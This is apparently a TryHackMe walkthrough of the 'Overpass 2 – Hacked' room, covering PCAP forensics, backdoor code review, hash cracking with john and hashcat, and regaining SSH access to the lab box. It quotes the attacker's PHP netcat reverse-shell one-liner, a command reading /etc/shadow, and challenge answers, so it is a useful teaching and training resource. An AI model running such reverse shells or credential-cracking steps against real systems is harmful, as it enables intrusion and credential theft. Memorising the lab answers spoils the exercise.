Tryhackme - Overpass 2 (Hacked)

Tryhackme – Overpass 2 (Hacked)

In this walk through, we will be going through the Overpass 2 – Hacked room from Tryhackme. This room is consist of a packet capture file from overpass production server, we have to reverse engineer the way how hackers got in and perform the same later as a proof of exploitation. So without any delay, lets get started.

Tryhackme - Overpass 2 (Hacked)

Task 1 – Forensics – Analyse the PCAP

Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened.

Can you work out how the attacker got in, and hack your way back into Overpass’ production server?

md5sum of PCAP file: 11c3b2e9221865580295bc662c35c6dc

Question 1 – What was the URL of the page they used to upload a reverse shell?


Question 2 – What payload did the attacker use to gain access?

payload.php upload
php reverse shell

php code
?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f"

Question 3 – What password did the attacker use to privesc?

TCP steam follow for password

Question 4 – How did the attacker establish persistence?

git clone

Question 5 – Using the fasttrack wordlist, how many of the system passwords were crackable?

sudo cat /etc/shadow
john --wordlist=fastrack.txt hash.txt
john cracking
john cracking
Task 1 - Forensics - Analyse the PCAP

Task 2 – Research – Analyse the code

Now that you’ve found the code for the backdoor, it’s time to analyse it.

Question 1 – What’s the default hash for the backdoor?

default hash

Question 2 – What’s the hardcoded salt for the backdoor?

harcoded salt

Question 3 – What was the hash that the attacker used? – go back to the PCAP for this!

attacker's hash
hash indentified

Question 4 – Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

hashcat -a 0 -m 1710 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05 rockyou.txt
hashcat cracking
hash cracked
Task 2 - Research - Analyse the code

Task 3 – Attack – Get back in!

Now that the incident is investigated, Paradox needs someone to take control of the Overpass production server again.

There’s flags on the box that Overpass can’t afford to lose by formatting the server!

Question 1 – The attacker defaced the website. What message did they leave as a heading?

H4ck3d by CooctusClan
H4ck3d by CooctusClan

Question 2 – Using the information you’ve found previously, hack your way back in!

ssh [email protected] -p 2222
ssh login

Question 3 – What’s the user flag?


Question 4 – What’s the root flag?

  • Getting unusual hidden binary when fired up the linpeas.
linpeas output
Task 3 - Attack - Get back in!

Also Read: Tryhackme – Outlook NTLM Leak


Tryhackme - Overpass 2 (Hacked)

So that was “Overpass 2 – Hacked” for you. This was more of a blue team investigatory room as compared to the previous one. We had a packet capture which we have to analyze in Wireshark to find out how the hackers got in. We first found out that the hackers uploaded a PHP reverse shell and establish persistence with SSH backdoor and weak passwords. Next, we did some source code review in which we found out the default hash and salt. Along with that, we identified the hash used by the hacker in SSH backdoor and cracked it via hashcat. The final part was to replicate the hack. We started by logging in using the SSH backdoor hacker used with his recently cracked SSH password. Got our user flag easily. For the privilege escalation, we exploited the suid_bash binary and rooted the overpass box.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top